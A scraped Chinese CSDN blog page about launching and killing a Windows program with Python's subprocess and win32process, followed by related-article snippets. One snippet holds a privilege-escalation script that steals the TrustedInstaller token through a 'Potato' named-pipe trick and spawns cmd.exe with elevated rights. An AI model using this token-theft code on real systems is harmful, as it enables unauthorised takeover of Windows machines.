subprocess与win32process

最新推荐文章于 2025-05-24 17:49:55 发布

原创最新推荐文章于 2025-05-24 17:49:55 发布 · 2.1k 阅读

0 ·

CC 4.0 BY-SA版权

python 专栏收录该内容

6 篇文章

订阅专栏

本文介绍了Python的subprocess模块在处理子进程时的基础用法，以及在Windows环境下如何结合win32process进行更深入的进程控制。内容包括启动进程、传递参数、获取进程信息以及如何优雅地关闭进程等关键操作。

当使用subprocess时

import  subprocess

subprocess.Popen(r'D:\Program Files (x86)\Netease\CloudMusic\cloudmusic.exe')

打开网易云音乐，报‘%1 不是有效的 Win32 应用程序’

后面用

import win32process

win32process.CreateProcess(r'D:\Program Files (x86)\Netease\CloudMusic\cloudmusic.exe', '', None, None, 0, win32process.CREATE_NO_WINDOW, None,
                           None, win32process.STARTUPINFO())

关掉进程：

subprocess.Popen(r'taskkill /im cloudmusic.exe /f /t')

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

j2melqr

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Win32 API (4) CreateProcess

cmiao-me

05-15

834

CreateProcess CreateProcess 是一个宏，根据是否定义符号常量 UNICODE 展开为 ASCII 和 UNICODE 两个版本，其实如果不是必须更推荐使用 UNICODE 版本的 API 函数，因为即便是 ASCII 版本的函数，内核层面也是通过 UNICODE 版本来实现的。函数原型： // ASCII 版本 BOOL CreateProcessA( LPCSTR lpApplicationName, LPSTR

subprocess.py报错OSError: [WinError 193] %1 不是有效的 Win32 应用程序

weixin_46069193的博客

03-07

1568

如果你没有对DER.py文件做任何修改的话，就在第102行和第103行间插入。

参与评论您还未登录，请先登录后发表或查看评论

Python ImportError: DLL load failed: %1 不是有效的 Win32 应用程序。

一直在路上的羊的博客

03-22

2451

出现这个问题的原因：安装包是32位的，而python版本是64位的，然后导入此包时就会出现上面的错误。

python学习笔记之pyinstaller、tkinter、subprocess与win32api

movax21h的博客

08-02

662

python学习笔记之pyinstaller、tkinter、subprocess与win32api 首先用pyinstaller打包应用程序还是很爽的。但是随着使用深入，遇到一些问题。 tkinter设置窗口图标后产生的问题 root.iconbitmap('fullpath/myicon.ico') 如果设置了窗口图标的时候需要用绝对路径。否则打包之后会找不到图标文件。使用subproce...

python读写文件&is和==区别&常用模块

冷小陌的博客

03-11

235

is和==区别 is不仅数据一样内存地址也一样 == 只判断数据和数据类型一样即可读写文件经典面试题：现在有一个5G的文件，用python写入另一个文件里 read(): 指定读取指定大小的文件（默认一次读取所有） readline(): 逐行读取，适合读大文件 readlines(): 一次性读取所有文件，将文件按行读取成列表我们使用了一个 while 循环来读取文件内容...

import win32pipe import win32security import win32api import win32con import win32process import subprocess def steal_trustedinstaller_token(): """ 查找并窃取TrustedInstaller进程令牌。返回TrustedInstaller令牌句柄。 """ import wmi # 需要安装pywin32和WMI库：pip install wmi # 使用WMI枚举进程 c = wmi.WMI() trusted_installer_pid = None for process in c.Win32_Process(): if "TrustedInstaller.exe" in process.Name: trusted_installer_pid = process.ProcessId break if not trusted_installer_pid: raise Exception("未找到TrustedInstaller进程，确保服务已运行（如通过sc start TrustedInstaller）") # 打开进程并获取令牌 PROCESS_QUERY_INFORMATION = 0x0400 h_process = win32api.OpenProcess(PROCESS_QUERY_INFORMATION, False, trusted_installer_pid) if not h_process: raise Exception("打开进程失败") h_token = win32security.OpenProcessToken(h_process, win32security.TOKEN_DUPLICATE | win32security.TOKEN_IMPERSONATE) if not h_token: win32api.CloseHandle(h_process) raise Exception("打开令牌失败") # 复制令牌以用于模拟 duplicated_token = win32security.DuplicateTokenEx( h_token, win32security.TOKEN_IMPERSONATE | win32security.TOKEN_QUERY, None, win32security.SecurityImpersonation, win32security.TokenImpersonation ) # 清理资源 win32api.CloseHandle(h_token) win32api.CloseHandle(h_process) return duplicated_token def impersonate_and_execute(token, command="cmd.exe"): """ 模拟令牌并执行命令。 token: 复制的令牌句柄 command: 要执行的命令 """ # 模拟令牌 win32security.ImpersonateLoggedOnUser(token) # 创建新进程（以TrustedInstaller权限） startup_info = win32process.STARTUPINFO() startup_info.dwFlags = win32con.STARTF_USESHOWWINDOW startup_info.wShowWindow = win32con.SW_SHOW process_info = win32process.CreateProcessAsUser( token, None, # 应用程序名 command, None, None, False, 0, None, None, startup_info ) print(f"[+] 已以TrustedInstaller权限启动: {command}") return process_info def exploit_potato(): """ 使用Potato漏洞提权到SYSTEM权限返回: SYSTEM令牌句柄 """ pipe_name = r'\\.\pipe\python_potato' h_pipe = win32pipe.CreateNamedPipe( pipe_name, win32pipe.PIPE_ACCESS_DUPLEX, win32pipe.PIPE_TYPE_BYTE | win32pipe.PIPE_WAIT, 1, 65536, 65536, 0, None ) # 触发漏洞利用 subprocess.Popen(['cmd.exe', '/c', 'echo Triggering exploit'], startupinfo=subprocess.STARTUPINFO()) win32pipe.ConnectNamedPipe(h_pipe, None) try: h_token = win32security.OpenThreadToken( win32api.GetCurrentThread(), win32security.TOKEN_ALL_ACCESS, True ) except: h_token = win32security.OpenProcessToken( win32api.GetCurrentProcess(), win32security.TOKEN_ALL_ACCESS ) duplicated_token = win32security.DuplicateTokenEx( h_token, win32security.TOKEN_ALL_ACCESS, None, win32security.SecurityImpersonation, win32security.TokenPrimary ) win32api.CloseHandle(h_pipe) return duplicated_token # 完整流程示例 if __name__ == "__main__": # 1. 提权到SYSTEM system_token = exploit_potato() # 2. 在SYSTEM上下文窃取TrustedInstaller令牌 win32security.ImpersonateLoggedOnUser(system_token) # 临时模拟SYSTEM ti_token = steal_trustedinstaller_token() # 3. 模拟TrustedInstaller并启动cmd impersonate_and_execute(ti_token, "cmd.exe /k whoami") # 输出将显示: NT SERVICE\TrustedInstaller 终端： Triggering exploit 然后就不动了

最新发布

11-14

hProcess, hThread, dwProcessId, dwThreadId = win32process.CreateProcessAsUser( token, None, # 应用程序名（使用命令行） command_line, None, # 进程安全属性 None, # 线程安全属性 False, # 不继承...

【win32process的进程映射】：共享内存在Python中的实现与应用的终极指南

[【win32process的进程映射】：共享内存在Python中的实现与应用的终极指南](https://user-images.githubusercontent.com/42946112/218423464-8c79e4cf-228b-4495-b254-ac39191b5218.png) # 1. Win32Process进程映射...

【win32process安全实践】：保护Python应用免受恶意进程影响的终极技巧

在深入探讨Win32process的安全机制之前，我们需要建立对安全概念的基本认识。安全通常指的是保护系统免受未授权访问和恶意攻击的能力。在操作系统级别，这意味着保护进程、内存和系统资源不被恶意软件或攻击者控制和...

subprocess.Popen([chrome_path, url], creationflags=subprocess.DETACHED_PROCESS | subprocess.CREATE_NEW_PROCESS_GROUP) 还是一样哦，修改了这个后还是不行

09-11

if sys.platform == 'win32': chrome_path = r"C:\Program Files\Google\Chrome\Application\chrome.exe" subprocess.Popen( f'cmd /c start "" "{chrome_path}" "{url}"', shell=True, creationflags=...

linux --shell脚本的基础知识

ltsazx的博客

09-04

348

shell脚本的基础知识1.什么是shell2.shell脚本的意义3.如何创建shell脚本 1.什么是shell 脚本中命令的解释器 2.shell脚本的意义 1.记录命令执行的过程和执行逻辑，以便以后重复执行 2.脚本可以批量处理主机 3.脚本可以定时处理主机 3.如何创建shell脚本 #!/bin/bash 幻数，声明这个脚本是用什么命令解释器运行的，比如是bash解释器，就在#！后写上bash文件在系统中的位置/bin/bash vim自动添加脚本首部调用方式有两种：第一

createprocess创建进程并获取进程窗口HWND

07-18

createprocess创建进程并获取进程窗口HWND,不管窗口是否在显示状态都可以获取。

python进程模块-subprocess，Process，multiprocessing

PureMastiff的博客

05-16

2586

subproces，Process，multiprocessing subprocess模块用法： subprocess的目的就是启动一个进程并和它通信 PIPE表示的是管道，进程间的通信 subprocess.Popen(args, bufsize=0, executable=None, stdin=None, stdout=None, stderr=None, preexec_...

python执行exe程序(win32process.CreateProcess)

weixin_30437481的博客

12-22

4960

CreateProcess 为了便于控制通过脚本运行的程序，可以使用win32process模块中的CreateProcess()函数。其函数原型如下所示。CreateProcess(appName, commandLine , processAttributes , threadAttributes , bInheritHandles ,dwCreationFlags , newEnvir...

<win32 API> CreateProcess 创建进程

Lulixue的专栏

12-04

3328

1. CreateProcess用于创建进程, 执行命令 BOOL CreateProcess ( LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES l

Win32 进程创建(CreateProcess)_句柄表、挂起模式

lygl35的博客

03-10

1050

通过命令行参数创建进程，可以自动打开浏览器并且登录一个网址命令行可以使用简写方式通过应用程序名创建进程也可以命令行参数和完整路径两个参数都写注意命令行参数前面要留一个空格代码延时 void aaa() { STARTUPINFO si = { 0 }; PROCESS_INFORMATION pi; si.cb = sizeof(si); TCHAR szApplicationName[] = TEXT("J://a//Z//D//1.e...

WIN32创建进程CreateProcessA 以及子进程和父进程

2402_87631701的博客

05-24

356

第一步我们使用代码打开一个成员然后获取进程快照并遍历当前的所有进程找到了对应的进程名我们就输出然后在代码尾部下断点可以看到输出的父进程pid去任务管理器中对比pid可以看到是我们这个项目名.exe运行的它所以我们这个项目.exe就是父进程我们打开的这个PETool就是子进程。LPSECURITY_ATTRIBUTES lpProcessAttributes,//指向 SECURITY_ATTRIBUTES 结构的指针，指定新进程的安全属性。

Win32 进程创建_句柄表

2301_77816603的博客

12-20

2083

进程就是一个 4GB的空间，因为32位系统里面的寻址范围是2的32次方。Explorer.exe程序也是被操作系统的内核程序创建的，只不过该程序在创建完毕桌面程序后就退出了。

Win32系统编程创建进程的参数详解和全局句柄表

woaijianji的博客

08-19

497

NULL, // Use parent’s starting directory //使用父进程目录作为当前目录，可以自己设置目录。这里其实有一堆，我们要用到的是CREATE_NEW_CONSOLE，大概释义就是可以创建一个单独的新的窗口，具体可以自行翻译。NULL, // Process handle not inheritable //不继承进程句柄。0, // No creation flags //没有创建标志。...

OSError: [WinError 193] %1 不是有效的 Win32 应用程序。

Zhong____的博客

10-31

1911

OSError: [WinError 193] %1 不是有效的 Win32 应用程序。